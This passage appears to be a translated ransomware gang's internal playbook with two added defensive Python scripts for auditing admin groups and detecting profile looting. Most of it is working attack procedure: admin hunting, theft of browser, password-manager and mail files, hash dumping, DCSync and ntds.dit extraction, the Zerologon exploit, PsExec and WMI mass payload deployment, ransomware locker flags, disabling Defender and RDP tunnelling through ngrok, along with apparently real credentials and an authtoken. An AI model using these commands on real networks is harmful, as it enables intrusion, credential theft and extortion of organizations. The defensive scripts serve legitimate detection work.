>memberOf: CN=Signature Canada,OU=Groupes,OU=Infra,DC=trudeaucorp,DC=com
>memberOf: CN=EDI,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=IT,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=TRUDEAU-MONTREAL,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=everyone,CN=Users,DC=trudeaucorp,DC=com
>uSNChanged: 6908986
>department: IT Manager
```
We look at the title and who we have here? Director of Information Technology. It would seem like a bull’s-eye, but the director does not always have passwords, but the System Administrator does.
Therefore, we carry out similar manipulations for the second user and more. At home (= in the conf), we make notes of who is who and write down the logins from the adfind (sAMAccountname) like this:
```
>sAMAccountName: gpetit
```

```
gpetit – Director of IT
staseb – such and such
```


The second part of option # 2 (Simplified):
We look initially at adfind_users.txt
We do a search by
```
title:
description
department
```
If you’re lucky, the posts will be directly written there. In my test case, it looks like this:

```
adfind_persons:280: >title: Responsable, logistique direct import
adfind_persons:1836: >title: Chef des services techniques
adfind_persons:1955: >title: Chef comptable
adfind_persons:4544: >title: Directeur, technologie de l’information
adfind_persons:6064: >title: Présidente
adfind_persons:6191: >title: Chargée de projets, mise en marché
adfind_persons:6285: >title: Directrice marketing
adfind_persons:6848: >title: Coordonnatrice à la logistique
adfind_persons:6948: >title: Responsable de l’expedition
```

Accordingly, we run our eyes and the accounts are found.


And so, these are easy methods. Consider alternative searches for admin accounts.
I know so far only 1 method of the simple ones – linkedin
We drive a request into Google
```
NASHERTVA.COM linkedin
```
instead of a domain – insert the domain of the office.

Go to Members
We do a search there by
```
System
Admin
Engineer
Network
It
```
If someone has a first name + last name, then we drive it into the advfind and the account is found.
If you know more effective methods – please write @rozetka

And so, part number 1 is over.
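The same adfind export the manual reads for admin hunting is what a defender should be reading first: every member of Domain Admins ought to have an identifiable owner, and service accounts should not be in that group at all (the `net group` output above shows a dozen SAP and service accounts in it). The following Python is an added example, not code from the leak or from this post: a parser for the adfind-style format quoted above (a `dn:` line followed by `>attribute: value` lines) plus a hygiene report for a privileged group. The service-name heuristic and the sample export are constructed.

```python
# Added example (not from the leaked manual or the blog post): a parser for the
# adfind-style export format quoted above (a "dn:" line followed by ">attr: value"
# lines, objects separated by blank lines) used to audit a privileged group the
# way a defender would. The heuristics and the sample export are constructed.
import re
from collections import defaultdict


def parse_adfind(text):
    """Return a list of objects; each is {attribute: [values]} with 'dn' included."""
    objects, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("dn:"):
            current = defaultdict(list)
            current["dn"].append(line[3:].strip())
            objects.append(current)
        elif line.startswith(">") and current is not None:
            attr, _, value = line[1:].partition(":")
            current[attr.strip()].append(value.strip())
    return [dict(o) for o in objects]


# Name fragments that usually mean a service account (constructed heuristic).
SERVICE_HINTS = re.compile(r"(svc|service|sql|sap|backup|\$$)", re.I)


def privileged_account_report(objects, group_cn="Domain Admins"):
    """For each member of the group, list hygiene issues a defender should fix."""
    by_dn = {o["dn"][0].lower(): o for o in objects}
    group = next((o for o in objects
                  if o.get("cn", [""])[0].lower() == group_cn.lower()), None)
    if group is None:
        return []
    report = []
    for member_dn in group.get("member", []):
        obj = by_dn.get(member_dn.lower())
        issues = []
        if obj is None:
            sam = "?"
            issues.append("member object missing from export")
        else:
            sam = obj.get("sAMAccountName", ["?"])[0]
            if not obj.get("title") and not obj.get("description"):
                issues.append("no title/description (owner unknown)")
            if SERVICE_HINTS.search(sam):
                issues.append("service-style account name in a Tier-0 group")
            if "user" not in obj.get("objectClass", []):
                issues.append("not a user object")
        report.append((sam, member_dn, issues))
    return report


# Constructed sample export in the same layout as the quoted adfind output.
SAMPLE_EXPORT = """
dn:CN=Domain Admins,CN=Users,DC=example,DC=com
>objectClass: top
>objectClass: group
>cn: Domain Admins
>member: CN=Jane Admin,OU=IT,DC=example,DC=com
>member: CN=sapservice01,CN=Users,DC=example,DC=com
>member: CN=Pat Lee,OU=Sales,DC=example,DC=com

dn:CN=Jane Admin,OU=IT,DC=example,DC=com
>objectClass: top
>objectClass: person
>objectClass: user
>cn: Jane Admin
>title: Systems Administrator
>sAMAccountName: jadmin

dn:CN=sapservice01,CN=Users,DC=example,DC=com
>objectClass: top
>objectClass: user
>cn: sapservice01
>sAMAccountName: sapservice01

dn:CN=Pat Lee,OU=Sales,DC=example,DC=com
>objectClass: top
>objectClass: user
>cn: Pat Lee
>sAMAccountName: plee
"""

if __name__ == "__main__":
    for sam, dn, issues in privileged_account_report(parse_adfind(SAMPLE_EXPORT)):
        print(sam, "-", "; ".join(issues) or "ok")
```

The parser keeps each `dn` verbatim (including the `\,` escapes seen in the `St-Amand\, Sebastien` line above), so group membership is resolved by exact, case-insensitive string match against the member object's own `dn` line.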

Getting started with admin hunt and inspection

Part # 2:
Hunting the admin the standard way via SharpView
SharpView.exe can be taken in the conference from your team leaders or from the software conference
The command for a hunt is as follows:
On Linux
```
execute-assembly /home/user/soft/scripts/SharpView.exe Find-DomainUserLocation -UserIdentity gpetit
```
On Windows>
```
execute-assembly C:\Users\Андрей\Soft\Hacking\SharpView.exe Find-DomainUserLocation -UserIdentity gpetit
```
where gpetit is the account of the person we're looking for. What is written in adfind_users in sAMAccountName – we insert it here.

At the output, we get approximately the following log:

```
UserDomain : domain
UserName : gpetit
ComputerName : DC01.domain.LOCAL
IPAddress : 172.16.1.3
SessionFrom : 192.168.100.55
SessionFromName :
LocalAdmin :

UserDomain : domain
UserName : gpetit
ComputerName : SQL01.domain.LOCAL
IPAddress : 172.16.1.30
SessionFrom : 192.168.100.55
SessionFromName :
LocalAdmin :

UserDomain : domain
UserName : gpetit
ComputerName : lptp-gpetit.domain.LOCAL
IPAddress : 172.16.1.40
SessionFrom : 192.168.100.55
SessionFromName :
LocalAdmin :

```


And so, the log will be in an approximate format, how can we deal with it –
Firstly, how the software works – it asks where the user is currently at least somehow authorized. And our user is not simple – he is an administrator and at some point he can be authorized on 20-30-50 servers.
How can we filter and not get bogged down in this?
First, we remove the OS that are not interesting to us
for example, the first in the list DC01 is clearly DomainController01, you can check it by adfind_computers.txt or portscan 172.16.1.13 and see that it is a SERVER OS. And we need a client room.
The second one is SQL01 – DB OS. Doesn’t suit us.
Let’s look at the third one – lptp-gpetit. Hmm, our user is gpetit and lptp stands for laptop. Perhaps this is just him.
# It also happens that the admin is connected ONLY to the server OS, but in the SessionFrom column there is an ip from another subnet (for example, a VPN subnet) where he sits quietly but SharpView did not "take" him – you can also take it into circulation.
Next is an IMPORTANT POINT.
First of all, beginners try to raise a session there and VERY OFTEN catch an alert. Alert from the admin = cutting out of the network, loss of time, nerves. This is NOT to be done!
What we’re going to do is poll it through the file system.
We do the following
```
shell net view \\172.16.1.40 /ALL
```


In the output we see its local disks
```
C$
D$
```
We put on the token (a token is recommended specifically, since pth leaves a slightly different Event ID on the domain controller, and an admin may notice that and cut us out)

Open File Manager in Cobalt:
```
\\172.16.1.40\c$
```

or use the shell via
```
shell dir \\172.16.1.40\c$
```

Take a quick look at what is on drive C
Go to the folder
```
\\172.16.1.40\c$\Users\gpetit
```

Usually, if it is REALLY the admin’s workstation, it has a lot of junk ala Virtualbox / putty / winscp etc. etc.

How can we “inspect” it, here is a list of interesting directories:

Desktop
```
\\172.16.1.40\c$\Users\gpetit\Desktop
```
```
\\172.16.1.40\c$\Users\gpetit\OneDrive
\\172.16.1.40\c$\Users\gpetit\Downloads
\\172.16.1.40\c$\Users\gpetit\Desktop
\\172.16.1.40\c$\Users\gpetit\Documents
```
Here are folders with custom configurations, below is a list of what can be extracted:
```
\\172.16.1.40\c$\Users\gpetit\AppData\Local
```

```
\\172.16.1.40\c$\Users\gpetit\AppData\Roaming
```

```
\\172.16.1.40\c$\Users\gpetit\AppData\Local\Google\Chrome\User Data\Default
```
Here is the History && Login Data from chrome.
History can be directly downloaded and viewed using DB Browser for SQLite (nix/win). What is useful is to see where the admin goes; you can sort the history by title and find a direct NAS / Tape / vSphere, etc. A VERY useful thing.
Login Data – contains logins and passwords. Encrypted (!). If it weighs 38-42kb then it is EMPTY. If it weighs more than 40-45 kb (from 100 kb to 1-2 megabytes), it means there are DEFINITELY passwords. If you have the required URL with the saved password, contact your team lead.
It also happens in chrome that there are no passwords in the Login Data, but if you carefully examine the profile folder, you will find an extensions folder and there is a LastPass. This can also happen in practice – in this case, log in via RDP at night and export passwords (either a keylogger or other options)

Similarly, you can look at the Firefox / Edge folder (I will add the paths, googling easily)

Also, system administrators often have the following folders in AppData\Roaming && AppData\Local:
```
Keepass
LastPass
```
Their configs are there. We drag them out and put them in the chat. If you find such a thing, it means MOST LIKELY there is a mass of those MOST necessary passwords.

It also happens that the admin stores something like this right on the desktop:
```
access.xlsx
passwords.docx
```
We swing, break, watch.

there is also an outlook folder
```
\\172.16.1.40\c$\Users\gpetit\AppData\Local\Microsoft\Outlook
```
Here is a file like
```
gpetit@domain.com – Exchange1.ost
```
It contains the CORRESPONDENCE of this pepper. You can download it to yourself, open the free ost viewer and see the login / outcome mail. REGULARLY it is useful to sort out difficult situations with this particular technique.
Copied simply – cut outlook.exe, copy-paste the .ost file, then the user will open outlook for himself.
```
\\172.16.1.40\c$\Users\gpetit\AppData\Local\Filezilla
\\172.16.1.40\c$\Users\gpetit\AppData\Roaming\Filezilla
```
Here sitemanager.xml files can be with FTP SSH credentials. Downloading, watching, throwing in confu.


Also inspect \\172.16.1.40\C$\ProgramData
+ Program files / x86
+ Local drives that showed up in net view \\host /ALL
D$ etc

Also in ad_users.txt there is homeDir – we also look at it, study it.


Look like that’s it.

For what the manual was written – so as not to try to go at breakneck speed to raise the session and catch alerts from the administrator.
Our job is rather to figure out what is how it works, and not to configure brute force for all kinds of access.
Everything is already hacked, you just need to look at everything! Through the eyes of an admin!
The main task of the admin hunt is to understand where he stores passwords and to steal the database \ spreadsheet \ file \ text file \ document
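An added detection example, not from the leaked manual: it runs over constructed file-share access records (the account, source address, share and relative-target fields of a Windows Security 5145 event; that this telemetry is available is an assumption) and flags reads of the profile paths the manual lists when they come from a different account over an administrative share.

```python
import re
from typing import Dict, List

# Constructed sample events (not real telemetry). Each line carries the four
# fields of a Windows Security 5145 "detailed file share" event that matter here:
# SubjectUserName | IpAddress | ShareName | RelativeTargetName. Users, hosts and
# paths are placeholders; the target paths mirror the folders the manual lists.
SAMPLE_EVENTS = r"""
CORP\jdoe|10.0.0.55|\\*\c$|Users\gpetit\AppData\Local\Google\Chrome\User Data\Default\Login Data
CORP\jdoe|10.0.0.55|\\*\c$|Users\gpetit\AppData\Local\Microsoft\Outlook\gpetit@domain.com - Exchange1.ost
CORP\svc_backup|10.0.0.20|\\*\D$|Backups\daily\2021-08-01.vbk
CORP\jdoe|10.0.0.55|\\*\c$|Users\gpetit\AppData\Roaming\FileZilla\sitemanager.xml
CORP\alice|10.0.0.77|\\*\share|Public\readme.txt
CORP\jdoe|10.0.0.55|\\*\c$|Users\gpetit\Desktop\passwords.docx
"""

# File types the manual singles out on an admin's workstation.
SENSITIVE_PATTERNS = [
    ("browser credential store", r"\\Google\\Chrome\\User Data\\[^\\]+\\(Login Data|History)$"),
    ("mail archive", r"\.(ost|pst)$"),
    ("FileZilla site manager", r"\\FileZilla\\sitemanager\.xml$"),
    ("password manager data", r"\\(KeePass|LastPass)\\"),
    ("credential document", r"\\[^\\]*(pass|access)[^\\]*\.(xlsx|docx|txt)$"),
]
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\[a-z]\$$", re.IGNORECASE)  # \\host\c$, \\*\D$ ...
PROFILE_DIR = re.compile(r"^Users\\([^\\]+)\\", re.IGNORECASE)   # Users\<owner>\...


def parse_events(text: str) -> List[Dict[str, str]]:
    """Split the constructed pipe-separated lines into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, ip, share, target = line.split("|", 3)
        events.append({"user": user, "ip": ip, "share": share, "target": target})
    return events


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like admin-profile hunting (empty if benign)."""
    reasons = []
    target = event["target"]
    for label, pattern in SENSITIVE_PATTERNS:
        if re.search(pattern, target, re.IGNORECASE):
            reasons.append(label)
    # Reading another user's profile through an administrative share is the core
    # of the technique: the operator browses \\host\c$\Users\<admin> as someone else.
    owner = PROFILE_DIR.match(target)
    if owner and ADMIN_SHARE.match(event["share"]):
        account = event["user"].split("\\")[-1]
        if account.lower() != owner.group(1).lower():
            reasons.append(f"cross-user profile read via admin share ({account} -> {owner.group(1)})")
    return reasons


def detect(text: str) -> List[Dict[str, object]]:
    """Run classify() over every event and keep the ones with at least one reason."""
    hits = []
    for event in parse_events(text):
        reasons = classify(event)
        if reasons:
            hits.append({**event, "reasons": reasons})
    return hits


def summarize(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Alert count per account@source, so one operator walking many files stands out."""
    counts: Dict[str, int] = {}
    for hit in hits:
        key = f"{hit['user']}@{hit['ip']}"
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["user"], hit["ip"], hit["target"], "->", "; ".join(hit["reasons"]))
    print(summarize(detect(SAMPLE_EVENTS)))
```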

File Name: If you need to scan the entire mesh in one sheet.txt

(*** special thanks to @Versace)
if you need to scan the entire grid with one sheet, then use the command for adfind:
adfind.exe -f objectcategory=computer -csv name cn OperatingSystem dNSHostName > some.csv

File Name: INITIAL ACTIONS.txt

INITIAL ACTIONS

1) Dumping AD – allows us to find out how many servers and workstations are in the network, as well as information about users, who holds which position, etc.
2) Dumping the shares (ShareFinder) – with its help we look where we have access with this user (on other PCs)
3) Kerberos attack – pulls hashes out of memory; with a successful dump and successful cracking, DomainAdmin is provided to us
4) If we have system rights, using the commands "hashdump" and "logonpasswords" we can pull off the hashes and mimikatz output, and we will already have obtained the domain user, and sometimes the domain admin
5) If we found the login and hash of the domain admin and at the same time could not crack the hash, we run the following command: pth Domain\Admin pass (in the form of a hash); using the command shell dir \\ip or hostname\c$ we check access to the server or workstation
6) If we find the login \ pass of the domain admin or a user, we can put on his token, the command looks like this: make_token Domain\Admin Pass; if you want to drop the token, the command is rev2self
7) If there is a system process in the session, system rights on the session can be raised with the getsystem command, see point (4)
8) Also, do not forget to watch the processes using the ps command; there you can find the user, migrate to his process > Explore > Process list > then select the user's process (the user must be different, not the one on the session) and click inject, select SSL listener
9) After migrating to a new user, you also need to dump the shares to see where you can break in with him, download, see how many "remote admin" there are in the text editor; if there is more than one, it means that there is access to another computer
11) Click on the session > File Browser > write the path \\ip or hostname of the computer to which you have access\c$, put the payload there, I'll hand it out the same way
12) The launch of the payload depends on its format, exe or dll; after launching, I will personally explain later
13) Ping servers and workstations like this: we need p.bat, I'll throw it into the group. We create a txt, call it domains.txt, add the hostnames of servers or workstations there. Hostnames are taken from the AD dump, using scripts; we will show how to use them
14) If you find some kind of password, you can also run it through smb_login – this is a tool in metasploit; I will hand out metasploit and tell you how to use it. smb_login will show on which servers or workstations there is access with these creds

File Name: Installing metasploit on VPS.txt

Installing metasploit on VPS

1 apt-get update
apt-get install curl
apt-get install tmux
apt-get install default-jdk
apt-get install postgresql
apt-get install nano
apt-get install gpg
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod +x msfinstall
./msfinstall
2
next we open

nano /opt/metasploit-framework/bin/msfdb

# if grep -q kali /etc/os-release; then
# echo "Metasploit running on Kali Linux as root, using system database

save with CTRL+O
msfdb init

File Name: List of TG forums, many interesting things.txt

File Name: locker launch parameter on Linux versions.txt

@all parameter for launching the locker on linux versions
Unix version launch parameters
--path
When using this parameter, the locker will encrypt files in the specified path. A required parameter; without it nothing will be locked.
./encryptor --path /path

--prockiller
Kills all processes that interfere with the opening of files.
./encryptor --path /path --prockiller
--log
Includes logging of all actions and errors
./encryptor --path /path --log /root/log.txt

--vmkiller (esxi only)
Shuts down all virtual machines

--vmlist (esxi only)
Specifies a file with a list of virtual machines that should not be shut down. One line for each vm
./encryptor --path /path --vmkiller --vmlist /tmp/list.txt
--detach
Detaches the process from the terminal.
So that if the ssh session drops, the locker will continue to work
and the files are not corrupted

ESXi version REQUEST SEPARATELY


If somewhere it does not start, I need an OS, a kernel version and a glibc version
/lib64/libc.so.6

File Name: Manual operation with AD DC.txt


C:\Windows\System32\config\sam
C:\Windows\System32\config\security
C:\Windows\System32\config\system
——————> these files store information such as hashed passwords of all Windows user accounts,
security-related parameters, encryption key data, and other important information about the OS kernel configuration.

sleep 5
ps
cd C:\ProgramData
AV_Query
powershell-import /opt/PowerSploit-dev/Recon/PowerView.ps1
powershell Get-DomainController
powershell Get-DomainComputer -Properties dnshostname
powershell Get-DomainComputer -OperatingSystem *server* -Properties dnshostname
shell net group “domain Admins” /domain
shell net group “Enterprise Admins” /domain
logonpasswords
shell nltest /DOMAIN_TRUSTS
make_token FMH\maysys 34stb4y@345
dcsync FMH
upload /home/tester/Desktop/payload/x64.dll (\\FMH-DC01.FMH.local\C$\ProgramData\x64.dll)
remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\x64.dll StartW
rm \\FMH-DC01.FMH.local\C$\ProgramData\x64.dll
upload /home/tester/Desktop/FMH/x64.dll (\\FMH-DC01.FMH.local\C$\ProgramData\x64.dll)
upload /home/tester/Desktop/FMH/tlt.dll (\\FMH-DC01.FMH.local\C$\ProgramData\tlt.dll)
remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\tlt.dll StartW
rm \\FMH-DC01.FMH.local\C$\ProgramData\tlt.dll
rm \\FMH-DC01.FMH.local\C$\ProgramData\x64.dll
rev2self
make_token FMH.local\Administrator 34stb4y*.*
powershell-import /opt/PowerSploit-dev/Recon/ShareFinder.ps1
powerpick Invoke-ShareFinder -Ping -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\share.txt
download C:\ProgramData\share.txt
rm C:\ProgramData\share.txt
dcsync FMH.local
upload /home/tester/Desktop/FMH/tlt.dll (\\OPERA-APP.FMH.local\C$\ProgramData\tlt.dll)
remote-exec wmi OPERA-APP.FMH.local rundll32.exe C:\ProgramData\tlt.dll StartW
rm \\OPERA-APP.FMH.local\C$\ProgramData\tlt.dll
sleep 0
net domain_controllers
net domain_trusts
shell whoami /all
shell hostname
powershell get-adcomputer -filter * | select -expand name
upload /home/host/Desktop/1.bat (C:\ProgramData\1.bat)
shell cd c:\programata
ls
powershell get-adcomputer -filter * -properties passwordlastset | select name, ipv4address, passwordlastset | sort passwordlastset


shell 1.bat
echo FMH-DC01 1>>c:\programdata\qu.txt
quser /server:FMH-DC01 1>>c:\programdata\qu.txt

powershell Get-ADComputer -Filter 'operatingsystem -notlike "*server*" -and enabled -eq "true"' -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\workstations.txt
powershell Get-ADComputer -Filter 'operatingsystem -notlike "*server*" -and enabled -eq "true"' -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize
ls
upload /home/host/Desktop/2.bat (C:\ProgramData\2.bat)
echo OPERA-APP 1>>c:\programdata\qu.txt
quser /server:OPERA-APP 1>>c:\programdata\qu.txt
powershell Get-ADComputer -Filter 'operatingsystem -like "*server*" -and enabled -eq "true"' -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize
ls


beacon> upload /home/host/Desktop/3.bat (C:\ProgramData\3.bat)
shell 3.bat
echo FMH-DC01 1>>c:\programdata\sh.txt
net view \\FMH-DC01 /all 1>>c:\programdata\sh.txt
powershell get-adcomputer -filter * -properties passwordlastset | select name, ipv4address, passwordlastset | sort passwordlastset
download C:\ProgramData\ts.txt
download c:\programdata\sh.txt
shell dir \\192.168.1.82\c$
shell whoami
rev2self
make_token MH.local\backups Riverd0gs1
shell dir \\192.168.1.82\c$
******************************************** ANOTHER MACHINE ******************
sleep 5
ps
logonpasswords
shell systeminfo /s FMH-EXCH01
rev2self
make_token FMH.local\Administrator 34stb4y*.*
sleep 0
shell dir \\192.168.1.82\c$
shell quser /server:192.168.1.89
shell net user scott.geer /dom
shell tasklist /s 192.168.1.89
download \\192.168.1.89\c$\users\scott.geer\AppData\Local\Google\Chrome\User Data\Default\History
download \\192.168.1.89\c$\users\scott.geer\AppData\Local\Google\Chrome\User Data\Default\Login Data
shell ping FMH-BACKUPS02
shell quser /server:FMH-BACKUPS02
shell quser /server:192.168.1.132
shell ping 192.168.1.132
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

get-adcomputer -filter * | select -expand name | out-file c:\programdata\hosts.txt

 

Get-ADComputer -Filter 'operatingsystem -notlike "windows" -and enabled -eq "true"' -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\other.txt


Get-ADComputer -Filter 'operatingsystem -like "server" -and enabled -eq "true"' -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\servers.txt


Get-ADComputer -Filter 'operatingsystem -notlike "server" -and enabled -eq "true"' -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\workstations.txt

with these scripts we dump and parse the hosts that are on the network
now I'll run a couple of bat files to see which processes are running, which users are sitting where, and all available shares on the hosts

*****************************************************************************************************************************************************************
we take the data from host.txt
to make a bat file
it is done like this
echo FMH-DC01 >> c:\programdata\qu.txt
quser /server:FMH-DC01 >> c:\programdata\qu.txt
and so on for every host in the output
we pack all this into a file with the .bat extension and run it on the host via cmd, or via the shell in CS: shell 1.bat
it is best to run it as DA (domain admin) so that there is RPC access to every reachable host in AD
—————————————————————————————————————————————————————–
This tool can make a shadow copy of ntds.dit and system files
1)vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\programdata
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\programdata
for dumping the ntds file
Sven, you asked how to dump quietly
but some strong AVs can still detect this, like Sophos, Sentinel or Palo Alto's
or this method
PS C:\> ntdsutil
C:\Windows\system32\ntdsutil.exe: activate instance ntds
Active instance set to “ntds”.
C:\Windows\system32\ntdsutil.exe: ifm
ifm: help

? – Show this help information
Create Full %s – Create IFM media for a full AD DC or an AD/LDS instance into folder %s
Create Full NoDefrag %s – Create IFM media without defragmenting for a full AD DC or an AD/LDS instance into folder %s
Create RODC %s – Create IFM media for a Read-only DC into folder %s
Create Sysvol Full %s – Create IFM media with SYSVOL for a full AD DC into folder %s
Create Sysvol Full NoDefrag %s – Create IFM media with SYSVOL and without defragmenting for a full AD DC into folder %s
Create Sysvol RODC %s – Create IFM media with SYSVOL for a Read-only DC into folder %s
Help – Show this help information
Quit – Return to the prior menu

ifm: create full C:\pwdadmin
//////////////////////////////////////////////////////////////////////////////////////////

File Name: MANUAL.txt

GOING TO THE AGENT:
RIGHT BUTTON ON THE AGENT AND CLICK INTERACT

1) SEE LIST OF ADMINISTRATORS shell net group "domain admins" /domain

2) DOMAIN NAME shell net view /all /domain

3) SEE LIST DC shell nltest /dclist:"NameDomain"

4) FIND OUT LIST OF SERVERS
LOADING THE POWERView MODULE
RIGHT BUTTON ON AGENT Get Info> Get Servers
GOT A LIST OF SERVERS

5) FIND OUT THE LIST OF COMPUTERS
BECAUSE THE PowerView MODULE IS ALREADY LOADED
RIGHT BUTTON BY AGENT Get Info> Get All Computers
GOT A LIST OF COMPUTERS
6) IT IS NECESSARY TO LEARN THE PASSWORDS OF ALL DOMAIN ADMINS
RIGHT BUTTON ON THE AGENT
HIT ACCESS> DUMP HASHES
GO ABOVE VIEW TAB> CREDENTIALS
WE TAKE ALL HASHES AND LOOKING FOR DOMAIN ADMINS

7) NEED TO FIND NAS, BACKUP
WITH THIS COMMAND WE WILL RECOGNIZE ALL SUBNETS OF THE DOMAIN powershell Get-NetSubnet
THE NEXT COMMAND SHOULD FIND OUT WHAT IP ADDRESS IS THE NAS, BACKUP
portscan 107.191.177.1-107.191.177.255 5000 icmp 1024

LIST OF USEFUL COMMANDS WHICH I CAN USE:
RESET AGENT RIGHTS BACK TO DEFAULT rev2self
ENABLE THE USER VIA CMD shell net user Administrator /active:yes
USER INFORMATION shell net user careadmin /domain
ENABLE RDP CONNECTION shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
DISABLE DEFENDER powershell Set-MpPreference -DisableRealtimeMonitoring $true
UPDATE POLICIES shell repadmin /syncall /AdeP
SHOW DOMAIN TRUSTS shell nltest /domain_trusts /all_trusts
RUNNING THE APPLICATION ON ANOTHER PC shell wmic /node:"PC NAME" process call create "COMMAND TO BE EXECUTED"

File Name: NetScan.txt

A great tool is NetScan, which makes it easy to scout and find NAS \ Backup, etc.
Scans networks by range using the credentials of the user / administrator on whose behalf the software was launched.
Returns the following information:
Hostname, Open Ports, Group / Domain Membership, Total Disk Space, Available Shares, Device Manufacturer, PC / Server Role

1) Load the NetScan folder on any infected PC. Let's say C:\Programdata\netscan

2) cd C:\programdata\netscan

3) make_token DOMAIN\admin password

4) shell netscan.exe /hide /auto:"result.xml" /config:netscan.xml /range:192.168.0.1-192.168.1.255
We change the ranges to our own, do not touch the rest

5) We are waiting. After completion, the result.xml file will appear in our folder, download it to your computer

6) We open NetScan on our Windows, load the downloaded file there and see the result in a convenient format.
We sort by disk size, so you will immediately understand where the juice itself is hidden

Special thanks to Perry for helping me find the technical documentation on which this manual is based.
Sonic, you can add NetScan to the algorithm

File Name: Operating CVE-2020-1472 Zerologon in Cobalt Strike.txt

Operating CVE-2020-1472 Zerologon at Cobalt Strike

Download the script here
https://github.com/rsmudge/ZeroLogon-BOF

We connect, as usual, the address of the script
ZeroLogon-BOF / dist / zerologon.cna

A new command should appear in the console – zerologon

Application:

net domain – get the domain name (for example domain.local)

We launch the exploit:
zerologon iunderstand domain.local

iunderstand is a stop word. By exploiting this vulnerability, we reset the password. This exploit can cause the domain controller to malfunction. LASTLY USE.

If successful, we get:
Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync

We do everything as written. we carry out
pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0

And we carry out
dcsync domain.local

If everything worked out successfully, we get NTDS

File Name: Personal safety.txt

I think everyone here works through a virtual machine. Therefore, I advise you to install a virtual machine on a encrypted volume using VeraCrypt.
1 download Veracrypt
2 you will need to allocate space on your disk for a file / or encrypt the entire disk at once
An important rule is that you will have to install the virtual machine again, because, unfortunately, when you encrypt your old working virtual machine,
an insurmountable error will appear in the code and it will no longer start. This is not a big problem, because you can get all your files from the image
of your old virtual machine via 7ZIP.

Do not forget to save your passes for entering this chat or Tokyo jaber, because if you lose it, then no one will help you to return.

(if anyone can find a way without installing a new OS, please write it down, please fix it)

File Name: PROSTITION.txt

COLLECTING A DOMAIN FOR COPYING A FILE
start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe" "C:\windows\temp\"
WE SAVE AS "COPY.BAT"

COLLECTING A DOMAIN TO RUN A FILE
start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe
WE SAVE AS "EXE.BAT"

COLLECTING WMI DATABASE FOR COPYING AND RUNNING A FILE ALL OVER THE DOMAIN
start wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166 \\DOMAIN CONTROLLER\share$\fx166.exe %APPDATA%\fx166.exe & %APPDATA%\fx166.exe"
WE SAVE AS “WMI.BAT”

File Name: raising rights (default).txt

raising rights (default)
if we see that the bot came in with a blue moniker, the first thing we check is the rights of our user on the machine (shell whoami /groups)
if we see at the very top that we have admin rights (BUILTIN\Administrators), then boldly right-click on the bot – access – elevate
Further:
svc-exe (start a new session on the bot not from a process but from services, the session will come in as SYSTEM with a red moniker)
uac-token-duplicate (start a session from the current user, but with a red moniker)

File Name: RDP NGROK.txt

Register at https://ngrok.com/
– Download ngrok.exe and load it on the wheelbarrow

In the ngrok account panel menu, select “Your Authtoken”
Copy the command with the token (without ./). For example:
ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg

– We go into the car on the wheelbarrow and write:
shell ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg

– We throw a tunnel to the RDP port:
shell ngrok tcp 3389

– We open the RDP on a wheelbarrow:
shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp 1 /f
